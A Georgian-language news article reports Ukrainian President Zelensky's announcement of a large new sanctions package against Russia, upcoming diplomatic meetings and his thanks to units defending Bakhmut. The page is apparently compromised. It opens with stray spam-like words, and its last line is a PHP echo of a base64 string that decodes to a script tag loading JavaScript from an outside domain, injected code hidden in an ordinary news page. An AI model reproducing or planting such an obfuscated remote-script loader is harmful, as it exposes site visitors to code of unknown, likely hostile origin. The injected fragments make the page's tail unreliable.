celsiusi
ავერსი შნაიდერი

უკრაინის პრეზიდენტმა, ვოლოდიმირ ზელენსკიმ რუსეთის წინააღმდეგ სანქციების გამკაცრება დააანონსა. ამის შესახებ უკრაინის პრეზიდენტმა ყოველდღიურ მიმართვაში ისაუბრა.

ზელენსკიმ დაასახელა უკრაინის პრიორიტეტები. მისი თქმით, ახლა უკრაინის მთავრობა რუსეთის წინააღდეგ სანქციების მექანიზმების გაძლიერებაზეა ორიენტირებული.

„გავმართე შეხვედრა სანქციების რეჟიმების გაძლიერების შესახებ, როგორც ჩვენი, ასევე ჩვენი პარტნიორების. ჩვენ ყურადღებით ვადევნებთ თვალს, თუ როგორ ცდილობს ტერორისტული სახელმწიფო სანქციების გვერდის ავლას, აღვრიცხავთ ყოველ ასეთ ქმედებას და ჩვენს პარტნიორებთან ერთად ვცდილობთ ამის დაბლოკვას. ვამზადებთ სანქციების დიდ პაკეტს“, – განაცხადა ზელენსკიმ.

უკრაინის პრეზიდენტის განცხადებით, მაისის თვე დატვირთული იქნება დიპლომატიური შეხვედრების მხრივაც.

„მაისი და მომდევნო თვეები უკრაინისთვის აქტიური იქნება საერთაშორისო სფეროში. იქნება ბევრი მოლაპარაკება, საერთაშორისო ღონისძიება, რომელიც გააძლიერებს ჩვენ თავდაცვას. ჩვენ ყველაფერზე ვმუშაობთ. დღეს რამდენიმე შეხვედრა გავმართე იმის თაობაზე, თუ რა იგეგმება ამ კვირაში და უახლოეს მომავალში“, – განაცხადა უკრაინის პრეზიდენტმა.

თავის გამოსვლაში ზელენსკიმ მადლობა გადაუხადა იმ სამხედრო შენაერთებს, რომლებიც ბახმუტის მიმართულებას იცავენ და განაცხადა, რომ ისინი ეფექტიანად მოქმედებენ.

468
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");